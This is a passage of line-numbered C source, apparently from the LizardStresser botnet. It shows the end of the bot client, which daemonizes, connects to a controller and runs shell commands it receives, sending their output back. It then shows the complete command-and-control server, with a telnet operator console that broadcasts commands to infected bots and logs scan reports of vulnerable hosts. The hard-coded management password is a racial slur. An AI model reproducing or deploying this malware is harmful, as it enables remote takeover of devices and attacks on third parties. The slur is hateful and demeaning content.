1891. int main(int argc, unsigned char *argv[])
1892. {
1893. if(SERVER_LIST_SIZE <= 0) return 0; //LOL PERSON WHO CONFIGURED DIS BOT IS RETARDED
1894.  
1895. srand(time(NULL) ^ getpid());
1896. init_rand(time(NULL) ^ getpid());
1897.  
1898. pid_t pid1;
1899. pid_t pid2;
1900. int status;
1901.  
1902. getOurIP();
1903. zprintf("MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", macAddress[0], macAddress[1], macAddress[2], macAddress[3], macAddress[4], macAddress[5]);
1904.  
1905. if (pid1 = fork()) {
1906. waitpid(pid1, &status, 0);
1907. exit(0);
1908. } else if (!pid1) {
1909. if (pid2 = fork()) {
1910. exit(0);
1911. } else if (!pid2) {
1912. } else {
1913. zprintf("fork failed\n");
1914. }
1915. } else {
1916. zprintf("fork failed\n");
1917. }
1918.  
1919. setsid();
1920. chdir("/");
1921.  
1922. signal(SIGPIPE, SIG_IGN);
1923.  
1924. while(1)
1925. {
1926. if(initConnection()) { printf("Failed to connect...\n"); sleep(5); continue; }
1927.  
1928. sockprintf(mainCommSock, "BUILD %s", getBuild());
1929.  
1930. char commBuf[4096];
1931. int got = 0;
1932. int i = 0;
1933. while((got = recvLine(mainCommSock, commBuf, 4096)) != -1)
1934. {
1935. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
1936. unsigned int *newpids, on;
1937. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
1938. pids[on - 1] = 0;
1939. numpids--;
1940. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
1941. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
1942. free(pids);
1943. pids = newpids;
1944. }
1945.  
1946. commBuf[got] = 0x00;
1947.  
1948. trim(commBuf);
1949.  
1950. if(strstr(commBuf, "PING") == commBuf)
1951. {
1952. sockprintf(mainCommSock, "PONG");
1953. continue;
1954. }
1955.  
1956. if(strstr(commBuf, "DUP") == commBuf) exit(0);
1957.  
1958. unsigned char *message = commBuf;
1959.  
1960. if(*message == '!')
1961. {
1962. unsigned char *nickMask = message + 1;
1963. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
1964. if(*nickMask == 0x00) continue;
1965. *(nickMask) = 0x00;
1966. nickMask = message + 1;
1967.  
1968. message = message + strlen(nickMask) + 2;
1969. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
1970.  
1971. unsigned char *command = message;
1972. while(*message != ' ' && *message != 0x00) message++;
1973. *message = 0x00;
1974. message++;
1975.  
1976. unsigned char *tmpcommand = command;
1977. while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
1978.  
1979. if(strcmp(command, "SH") == 0)
1980. {
1981. unsigned char buf[1024];
1982. int command;
1983. if (listFork()) continue;
1984. memset(buf, 0, 1024);
1985. szprintf(buf, "%s 2>&1", message);
1986. command = fdpopen(buf, "r");
1987. while(fdgets(buf, 1024, command) != NULL)
1988. {
1989. trim(buf);
1990. sockprintf(mainCommSock, "%s", buf);
1991. memset(buf, 0, 1024);
1992. sleep(1);
1993. }
1994. fdpclose(command);
1995. exit(0);
1996. }
1997.  
1998. unsigned char *params[10];
1999. int paramsCount = 1;
2000. unsigned char *pch = strtok(message, " ");
2001. params[0] = command;
2002.  
2003. while(pch)
2004. {
2005. if(*pch != '\n')
2006. {
2007. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
2008. memset(params[paramsCount], 0, strlen(pch) + 1);
2009. strcpy(params[paramsCount], pch);
2010. paramsCount++;
2011. }
2012. pch = strtok(NULL, " ");
2013. }
2014.  
2015. processCmd(paramsCount, params);
2016.  
2017. if(paramsCount > 1)
2018. {
2019. int q = 1;
2020. for(q = 1; q < paramsCount; q++)
2021. {
2022. free(params[q]);
2023. }
2024. }
2025. }
2026. }
2027. printf("Link closed by server.\n");
2028. }
2029.  
2030. return 0; //dis is da propa codez
2031.  
2032. }
2033. Server.c
2034.  
2035. /*
2036. Chippy1337 and @packetprophet present:
2037. LizardStresser rekt
2038. This is the custom control server
2039.  
2040. LICENSE AGREEMENT:
2041. If you lulz'd, you must sent BTC to
2042. 1N4MxbXsooU9aMU41NPrSbgZKpJjtwsnar
2043.  
2044. Death to skids
2045. */
2046. #include <stdio.h>
2047. #include <stdlib.h>
2048. #include <string.h>
2049. #include <sys/types.h>
2050. #include <sys/socket.h>
2051. #include <netdb.h>
2052. #include <unistd.h>
2053. #include <time.h>
2054. #include <fcntl.h>
2055. #include <sys/epoll.h>
2056. #include <errno.h>
2057. #include <pthread.h>
2058. #include <signal.h>
2059.  
2060. #define MY_MGM_PASS "nigger"
2061. #define MY_MGM_PORT 8888
2062.  
2063. #define MAXFDS 1000000 // No way we actually reach this amount. Ever.
2064.  
2065. struct clientdata_t {
2066. uint32_t ip;
2067. char build[7];
2068. char connected;
2069. } clients[MAXFDS];
2070. struct telnetdata_t {
2071. int connected;
2072. } managements[MAXFDS];
2073. static volatile FILE *fileFD;
2074. static volatile int epollFD = 0;
2075. static volatile int listenFD = 0;
2076. static volatile int managesConnected = 0;
2077. int fdgets(unsigned char *buffer, int bufferSize, int fd)
2078. {
2079. int total = 0, got = 1;
2080. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
2081. return got;
2082. }
2083. void trim(char *str) // Remove whitespace from a string and properly null-terminate it.
2084. {
2085. int i;
2086. int begin = 0;
2087. int end = strlen(str) - 1;
2088. while (isspace(str[begin])) begin++;
2089. while ((end >= begin) && isspace(str[end])) end--;
2090. for (i = begin; i <= end; i++) str[i - begin] = str[i];
2091. str[i - begin] = '\0';
2092. }
2093.  
2094.  
2095. static int make_socket_non_blocking (int sfd)
2096. { // man fcntl
2097. int flags, s;
2098. flags = fcntl (sfd, F_GETFL, 0);
2099. if (flags == -1)
2100. {
2101. perror ("fcntl");
2102. return -1;
2103. }
2104. flags |= O_NONBLOCK;
2105. /*
2106. F_SETFL (int)
2107. Set the file status flags to the value specified by arg. File access mode (O_RDONLY, O_WRONLY, O_RDWR) and file creation flags (i.e., O_CREAT, O_EXCL, O_NOCTTY, O_TRUNC) in arg are
2108. ignored. On Linux this command can change only the O_APPEND, O_ASYNC, O_DIRECT, O_NOATIME, and O_NONBLOCK flags.
2109. */
2110. s = fcntl (sfd, F_SETFL, flags);
2111. if (s == -1)
2112. {
2113. perror ("fcntl");
2114. return -1;
2115. }
2116. return 0;
2117. }
2118.  
2119.  
2120. static int create_and_bind (char *port)
2121. {
2122. struct addrinfo hints;
2123. struct addrinfo *result, *rp;
2124. int s, sfd;
2125. memset (&hints, 0, sizeof (struct addrinfo));
2126. hints.ai_family = AF_UNSPEC; /* Return IPv4 and IPv6 choices */
2127. hints.ai_socktype = SOCK_STREAM; /* We want a TCP socket */
2128. hints.ai_flags = AI_PASSIVE; /* All interfaces */
2129. s = getaddrinfo (NULL, port, &hints, &result);
2130. if (s != 0)
2131. {
2132. fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));
2133. return -1;
2134. }
2135. for (rp = result; rp != NULL; rp = rp->ai_next)
2136. {
2137. sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);
2138. if (sfd == -1) continue;
2139. int yes = 1;
2140. if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");
2141. s = bind (sfd, rp->ai_addr, rp->ai_addrlen);
2142. if (s == 0)
2143. {
2144. break;
2145. }
2146. close (sfd);
2147. }
2148. if (rp == NULL)
2149. {
2150. fprintf (stderr, "Could not bind\n");
2151. return -1;
2152. }
2153. freeaddrinfo (result);
2154. return sfd;
2155. }
2156. void broadcast(char *msg, int us) // sends message to all bots, notifies the management clients of this happening
2157. {
2158. int sendMGM = 1;
2159. if(strcmp(msg, "PING") == 0) sendMGM = 0; // Don't send pings to management. Why? Because a human is going to ignore it.
2160. char *wot = malloc(strlen(msg) + 10);
2161. memset(wot, 0, strlen(msg) + 10);
2162. strcpy(wot, msg);
2163. trim(wot);
2164. time_t rawtime;
2165. struct tm * timeinfo;
2166. time(&rawtime);
2167. timeinfo = localtime(&rawtime);
2168. char *timestamp = asctime(timeinfo);
2169. trim(timestamp);
2170. int i;
2171. for(i = 0; i < MAXFDS; i++)
2172. {
2173. if(i == us || (!clients[i].connected && (sendMGM == 0 || !managements[i].connected))) continue;
2174. if(sendMGM && managements[i].connected)
2175. {
2176. send(i, "\x1b[33m", 5, MSG_NOSIGNAL);
2177. send(i, timestamp, strlen(timestamp), MSG_NOSIGNAL);
2178. send(i, ": ", 2, MSG_NOSIGNAL);
2179. } //just a prompt with a timestamp.
2180. printf("sent to fd: %d\n", i); // debug info, possibly also intrusion detection. Tells you when a management client connected on command line.
2181. send(i, msg, strlen(msg), MSG_NOSIGNAL);
2182. if(sendMGM && managements[i].connected) send(i, "\r\n\x1b[31m> \x1b[0m", 13, MSG_NOSIGNAL); // send a cool looking prompt to a manager/admin
2183. else send(i, "\n", 1, MSG_NOSIGNAL);
2184. }
2185. free(wot);
2186. }
2187.  
2188. void *epollEventLoop(void *useless) // the big loop used to control each bot asynchronously. Many threads of this get spawned.
2189. {
2190. struct epoll_event event;
2191. struct epoll_event *events;
2192. int s;
2193. events = calloc (MAXFDS, sizeof event);
2194. while (1)
2195. {
2196. int n, i;
2197. n = epoll_wait (epollFD, events, MAXFDS, -1);
2198. for (i = 0; i < n; i++)
2199. {
2200. if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN)))
2201. {
2202. clients[events[i].data.fd].connected = 0;
2203. close(events[i].data.fd);
2204. continue;
2205. }
2206. else if (listenFD == events[i].data.fd)
2207. {
2208. while (1)
2209. {
2210. struct sockaddr in_addr;
2211. socklen_t in_len;
2212. int infd, ipIndex;
2213.  
2214. in_len = sizeof in_addr;
2215. infd = accept (listenFD, &in_addr, &in_len); // accept a connection from a bot.
2216. if (infd == -1)
2217. {
2218. if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;
2219. else
2220. {
2221. perror ("accept");
2222. break;
2223. }
2224. }
2225.  
2226. clients[infd].ip = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr;
2227.  
2228. int dup = 0;
2229. for(ipIndex = 0; ipIndex < MAXFDS; ipIndex++) // check for duplicate clients by seeing if any have the same IP as the one connecting
2230. {
2231. if(!clients[ipIndex].connected || ipIndex == infd) continue;
2232.  
2233. if(clients[ipIndex].ip == clients[infd].ip)
2234. {
2235. dup = 1;
2236. break;
2237. }
2238. }
2239.  
2240. if(dup)
2241. {
2242. printf("dup client\n"); // warns the operator on command line
2243. if(send(infd, "!* LOLNOGTFO\n", 13, MSG_NOSIGNAL) == -1) { close(infd); continue; } // orders all the bots to immediately kill themselves if we see a duplicate client! MAXIMUM PARANOIA
2244. if(send(infd, "DUP\n", 4, MSG_NOSIGNAL) == -1) { close(infd); continue; } // same thing as above.
2245. close(infd);
2246. continue;
2247. }
2248.  
2249. s = make_socket_non_blocking (infd);
2250. if (s == -1) { close(infd); break; }
2251.  
2252. event.data.fd = infd;
2253. event.events = EPOLLIN | EPOLLET;
2254. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);
2255. if (s == -1)
2256. {
2257. perror ("epoll_ctl");
2258. close(infd);
2259. break;
2260. }
2261.  
2262. clients[infd].connected = 1;
2263. //send(infd, "!* SCANNER ON\n", 14, MSG_NOSIGNAL);
2264. }
2265. continue;
2266. }
2267. else
2268. {
2269. int thefd = events[i].data.fd;
2270. struct clientdata_t *client = &(clients[thefd]);
2271. int done = 0;
2272. client->connected = 1;
2273. while (1)
2274. {
2275. ssize_t count;
2276. char buf[2048];
2277. memset(buf, 0, sizeof buf);
2278.  
2279. while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0)
2280. {
2281. if(strstr(buf, "\n") == NULL) { done = 1; break; }
2282. trim(buf);
2283. if(strcmp(buf, "PING") == 0) // basic IRC-like ping/pong challenge/response to see if server is alive
2284. {
2285. if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response
2286. continue;
2287. }
2288. if(strstr(buf, "BUILD ") == buf)
2289. {
2290. char *build = strstr(buf, "BUILD ") + 6;
2291. if(strlen(build) > 6) { printf("build bigger then 6\n"); done = 1; break; }
2292. memset(client->build, 0, 7);
2293. strcpy(client->build, build);
2294. continue;
2295. }
2296. if(strstr(buf, "REPORT ") == buf) // received a report of a vulnerable system from a scan
2297. {
2298. char *line = strstr(buf, "REPORT ") + 7;
2299. fprintf(fileFD, "%s\n", line); // let's write it out to disk without checking what it is!
2300. fflush(fileFD);
2301. //TODO: automatically exploit that particular IP after scanning for dir and uploading correct arch stuffs.
2302. continue;
2303. }
2304. if(strcmp(buf, "PONG") == 0)
2305. {
2306. //should really add some checking or something but meh
2307. continue;
2308. }
2309.  
2310. printf("buf: \"%s\"\n", buf);
2311. }
2312.  
2313. if (count == -1)
2314. {
2315. if (errno != EAGAIN)
2316. {
2317. done = 1;
2318. }
2319. break;
2320. }
2321. else if (count == 0)
2322. {
2323. done = 1;
2324. break;
2325. }
2326. }
2327.  
2328. if (done)
2329. {
2330. client->connected = 0;
2331. close(thefd);
2332. }
2333. }
2334. }
2335. }
2336. }
2337.  
2338. unsigned int clientsConnected() // counts the number of bots connected by looping over every possible file descriptor and checking if it's connected or not
2339. {
2340. int i = 0, total = 0;
2341. for(i = 0; i < MAXFDS; i++)
2342. {
2343. if(!clients[i].connected) continue;
2344. total++;
2345. }
2346.  
2347. return total;
2348. }
2349.  
2350. void *titleWriter(void *sock) // just an informational banner
2351. {
2352. // this LOOKS vulnerable, but it's actually not.
2353. // there's no way we can have 2000 digits' worth of clients/bots connected to overflow that char array
2354. int thefd = (int)sock;
2355. char string[2048];
2356. while(1)
2357. {
2358. memset(string, 0, 2048);
2359. sprintf(string, "%c]0;Bots connected: %d | Clients connected: %d%c", '\033', clientsConnected(), managesConnected, '\007');
2360. // \007 is a bell character... causes a beep. Why is there a beep here?
2361. if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return;
2362.  
2363. sleep(2);
2364. }
2365. }
2366.  
2367.  
2368. void *telnetWorker(void *sock)
2369. {
2370. int thefd = (int)sock;
2371. managesConnected++;
2372. pthread_t title;
2373. char buf[2048];
2374. memset(buf, 0, sizeof buf);
2375.  
2376. if(send(thefd, "password: ", 10, MSG_NOSIGNAL) == -1) goto end; /* failed to send... kill connection */
2377. if(fdgets(buf, sizeof buf, thefd) < 1) goto end; /* no data, kill connection */
2378. trim(buf);
2379. if(strcmp(buf, MY_MGM_PASS) != 0) goto end; /* bad pass, kill connection */
2380. memset(buf, 0, 2048);
2381. if(send(thefd, "\033[1A", 4, MSG_NOSIGNAL) == -1) goto end;
2382. pthread_create(&title, NULL, &titleWriter, sock); /* writes the informational banner to the admin after a login */
2383. if(send(thefd, "\x1b[31m*****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
2384. if(send(thefd, "* WELCOME TO THE BALL PIT *\r\n", 43, MSG_NOSIGNAL) == -1) goto end;
2385. if(send(thefd, "* Now with \x1b[32mrefrigerator\x1b[31m support *\r\n", 53, MSG_NOSIGNAL) == -1) goto end;
2386. if(send(thefd, "*****************************************\r\n\r\n> \x1b[0m", 51, MSG_NOSIGNAL) == -1) goto end;
2387. /* If we can't send the useless banner, kill ourselves! Amazing error handling! */
2388. managements[thefd].connected = 1;
2389.  
2390. while(fdgets(buf, sizeof buf, thefd) > 0)
2391. {
2392. trim(buf);
2393. if(send(thefd, "\x1b[31m> \x1b[0m", 11, MSG_NOSIGNAL) == -1) goto end;
2394. if(strlen(buf) == 0) continue;
2395. printf("management: \"%s\"\n", buf);
2396. broadcast(buf, thefd); // take a command, send it to the bots
2397. memset(buf, 0, 2048);
2398. }
2399.  
2400. end: // cleanup dead socket
2401. managements[thefd].connected = 0;
2402. close(thefd);
2403. managesConnected--;
2404. }
2405.  
2406. void *telnetListener(void *useless)
2407. {
2408. int sockfd, newsockfd;
2409. socklen_t clilen;
2410. struct sockaddr_in serv_addr, cli_addr;
2411. sockfd = socket(AF_INET, SOCK_STREAM, 0);
2412. if (sockfd < 0) perror("ERROR opening socket");
2413. bzero((char *) &serv_addr, sizeof(serv_addr));
2414. serv_addr.sin_family = AF_INET;
2415. serv_addr.sin_addr.s_addr = INADDR_ANY;
2416. serv_addr.sin_port = htons(MY_MGM_PORT);
2417. if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) perror("ERROR on binding");
2418. listen(sockfd,5);
2419. clilen = sizeof(cli_addr);
2420. while(1)
2421. {
2422. newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
2423. if (newsockfd < 0) perror("ERROR on accept");
2424. pthread_t thread;
2425. pthread_create( &thread, NULL, &telnetWorker, (void *)newsockfd);
2426. }
2427. }
2428.  
2429. int main (int argc, char *argv[])
2430. {
2431. signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel
2432.  
2433. int s, threads;
2434. struct epoll_event event;
2435.  
2436. if (argc != 3)
2437. {
2438. fprintf (stderr, "Usage: %s [port] [threads]\n", argv[0]);
2439. exit (EXIT_FAILURE);
2440. }
2441. fileFD = fopen("output.txt", "a+"); // TOCTOU vuln if we have access to CnC
2442. threads = atoi(argv[2]);
2443.  
2444. listenFD = create_and_bind (argv[1]); // try to create a listening socket, die if we can't
2445. if (listenFD == -1) abort ();
2446.  
2447. s = make_socket_non_blocking (listenFD); // try to make it nonblocking, die if we can't
2448. if (s == -1) abort ();
2449.  
2450. s = listen (listenFD, SOMAXCONN); // listen with a huuuuge backlog, die if we can't
2451. if (s == -1)
2452. {
2453. perror ("listen");
2454. abort ();
2455. }
2456.  
2457. epollFD = epoll_create1 (0); // make an epoll listener, die if we can't
2458. if (epollFD == -1)
2459. {
2460. perror ("epoll_create");
2461. abort ();
2462. }
2463.  
2464. event.data.fd = listenFD;
2465. event.events = EPOLLIN | EPOLLET;
2466. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);
2467. if (s == -1)
2468. {
2469. perror ("epoll_ctl");
2470. abort ();
2471. }
2472.  
2473. pthread_t thread[threads + 2];
2474. while(threads--)
2475. {
2476. pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // make a thread to command each bot individually
2477. }
2478.  
2479. pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL);
2480.  
2481. while(1)
2482. {
2483. broadcast("PING", -1); // ping bots every 60 sec on the main thread
2484.  
2485. sleep(60);
2486. }
2487.  
2488. close (listenFD);
2489.  
2490. return EXIT_SUCCESS;
2491. }